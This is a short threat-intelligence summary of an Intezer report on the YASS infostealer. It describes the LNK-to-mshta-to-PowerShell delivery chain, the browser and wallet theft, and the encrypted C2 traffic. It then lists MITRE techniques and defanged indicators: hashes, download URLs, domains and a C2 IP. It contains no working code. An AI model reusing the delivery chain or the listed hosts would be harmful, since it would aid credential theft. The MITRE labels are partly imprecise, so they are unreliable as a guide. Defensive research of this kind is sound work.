Intezer’s investigation uncovers a new infostealer variant named Yet Another Silly Stealer (YASS), which shares traits with CryptBot but differs significantly in code and behavior. The write-up details the delivery chain via the MustardSandwich downloader, a multi-stage execution flow, encrypted C2 communications, and the potential NetSupport backdoor.hashtags #YASS #CryptBot
Keypoints
- Intezer identifies a new infostealer variant named Yet Another Silly Stealer (YASS).
- YASS is delivered via a multi-stage downloader called MustardSandwich.
- The downloader uses a Windows shell link (LNK) file to trigger PowerShell execution via mshta.
- YASS employs obfuscation and anti-analysis techniques and targets data from browsers and wallets.
- Communications with the C2 server are conducted over encrypted HTTP POST requests.
- YASS can deploy the NetSupport Client as a backdoor on infected hosts.
- Despite similarities to CryptBot, YASS has notable implementation differences and is documented as a distinct variant.
MITRE Techniques
- [T1203] Exploitation for Client Execution – Used to execute malicious code within the MustardSandwich delivery chain. ‘Exploitation of vulnerabilities in software to execute malicious code.’
- [T1059] PowerShell – PowerShell scripts are used in the downloader to maintain persistence on the infected machine. ‘Use of PowerShell scripts to maintain persistence on the infected machine.’
- [T1003] Credential Access – Stealing credentials from browsers and applications. ‘Stealing credentials from browsers and applications.’
- [T1041] Exfiltration – Exfiltration of sensitive data via HTTP POST requests. ‘Exfiltration of sensitive data via HTTP POST requests.’
- [T1071] Web Protocols – Communication with the C2 server over HTTP. ‘Communication with C2 server over HTTP.’
Indicators of Compromise
- [Hash] LNK file – e3bf61f6f96d1a121a1f7f47188cd36fc51f4565ca8cd8fc07207e56a038e7ca
- [Hash] HTA (EXE) – fd7654c5bb79652bc0db2696da35497b9aff2c783ec4c83705d33d329dc742d8
- [Hash] ZIP – b2080e7705283fce7e03c8895977c5e8c451b5f8a6eb3faecb8acb986a1587c6
- [Hash] IDATLOADER – 4810333bf96fb808604f3657118c734c3dd8ee4baa3e6ffe8da548ae0c8e15d3
- [Hash] YASS (Stealer) – 7ac46eb84f4b6d25601f23d2c30b7e80b6f3b2d82d3240234fc50af75290a29f
- [URL] Hosting Server – https://nextomax.b-cdn[.]net/nexto
- [URL] Hosting ZIP – https://nextomax.b-cdn[.]net/L2.zip
- [URL] Pinged by PowerShell Script – https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
- [Domain] NetSupport Hosting – brewdogebar[.]com
- [Domain] Additional Domains – enotik5050[.]com, barsuk5050[.]com
- [IP] C2/IP – 94.232.244[.]133
Read more: https://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/